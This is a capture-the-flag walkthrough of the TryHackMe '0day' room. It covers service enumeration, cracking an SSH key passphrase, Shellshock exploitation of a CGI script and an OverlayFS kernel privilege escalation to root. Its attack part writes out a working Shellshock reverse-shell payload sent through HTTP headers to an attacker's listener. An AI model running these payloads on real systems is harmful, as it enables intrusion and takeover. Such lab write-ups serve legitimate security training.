TryHackMe | 0day

In this walkthrough, I demonstrate how I obtained complete ownership of the 0day room on TryHackMe
TryHackMe | 0day
In: TryHackMe, Attack, CTF

Nmap Results

# Nmap 7.94SVN scan initiated Sat Apr 13 01:37:04 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt
Nmap scan report for
Host is up (0.076s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Apr 13 01:37:50 2024 -- 1 IP address (1 host up) scanned in 45.60 seconds

Service Enumeration


Gobuster Enumeration

Directory and File Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x php,html,txt -o gobuster-80.txt
/admin                (Status: 301) [Size: 311] [-->]
/backup               (Status: 301) [Size: 312] [-->]
/cgi-bin              (Status: 301) [Size: 313] [-->]
/cgi-bin/             (Status: 403) [Size: 287]
/cgi-bin/.html        (Status: 403) [Size: 292]
/css                  (Status: 301) [Size: 309] [-->]
/img                  (Status: 301) [Size: 309] [-->]
/index.html           (Status: 200) [Size: 3025]
/js                   (Status: 301) [Size: 308] [-->]
/robots.txt           (Status: 200) [Size: 38]
/robots.txt           (Status: 200) [Size: 38]
/secret               (Status: 301) [Size: 312] [-->]
/server-status        (Status: 403) [Size: 292]
/uploads              (Status: 301) [Size: 313] [-->]


/backup/ contains a password-protected SSH private key, let's keep this handy for later
curl -s -o ssh_key.pem
chmod 400 ssh_key.pem

Save the file locally

ssh2john ssh_key.pem > ssh_key_hash

Generate a hash to crack the SSH key password

john --wordlist=rockyou.txt ssh_key_hash

Crack the hash

Enumerating Some More

I do not yet have a username that I can pair with this SSH key, so we'll have to hunt around for additional subdirectories and files.

I enumerated /secret/, /uploads/, /backup/, and /admin/ with common file extensions based on what I thought would be in the directory. However, I didn't have any luck finding anything.

And even though the /cgi-bin/ directory is forbidden to us, it's a good idea to check here for any scripts that might be available. CGI scripts may take user input and parse it on the server, which could lead to remote code execution (RCE)

gobuster dir -u http://$target/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x sh,py,rb,cgi -o gobuster-80_cgibin.txt
/test.cgi             (Status: 200) [Size: 13]


CGI | HackTricks | HackTricks

Searching Google for CGI exploits, this article comes up with some good ideas

it looks like this CGI script is vulnerable to ShellShock
HackTheBox | Shocker
HackTheBox | Shocker

I'll just use my POC from here


The CGI script on the target is vulnerable to the ShellShock vulnerability, which executes a user-controlled function due to a specially-crafted set of characters in some HTTP headers. The server administrator must update the underlying operating system to resolve this issue or disable the CGI script.

Test command execution

To get a shell on the machine should be as simple as changing the payload in the PWN variable from before.

PWN="() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACK_IP/$ATTACK_PORT 0>&1 &'"

Change the payload

sudo rlwrap nc -lnvp 80

Start a listener on port 80

curl \
-H "User-Agent: $PWN" \
-H "Cookie: $PWN" \
-H "Referer: $PWN" -v

Run the payload against the target CGI script

Post-Exploit Enumeration

Operating Environment

OS & Kernel

VERSION="14.04.1 LTS, Trusty Tahr"
PRETTY_NAME="Ubuntu 14.04.1 LTS"

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on ubuntu.    

Users and Groups

Local Users

ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash    

Local Groups


Network Configurations

Network Interfaces

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:8e:e4:9b:36:1f brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::8e:e4ff:fe9b:361f/64 scope link 
       valid_lft forever preferred_lft forever    

Interesting Files


lrwxrwxrwx  1 root root   14 Sep  2  2020 .secret -> /root/root.txt   

Privilege Escalation

After hunting around for a good bit, I didn't spot much in the way of misconfigurations or interesting files that might leak some data that could be used to pivot to another user. So, I decided to focus on the fact that this host operating system is very old.

This host may be vulnerable FUSE OverlayFS privilege escalation

The kernel version and operating system version of this host definitely line up with the comments in the exploit POC.

We can see that FUSE is installed on the target
'gcc' is also installed so we can compile locally
curl -o pwn.c
sudo python3 -m http.server 80

Download the exploit locally and host it

File downloaded locally
gcc is complaining that it can't find a dependency, but it is installed
What are the Default $PATH Values?
On Mac OS X, the default $PATH values are: /usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin What are the default values on Linux?

I suspect this might be a PATH issue with the 'www-data' user

export PATH='/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games'
Nice! No compilation errors!
We are root!





More from 0xBEN
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.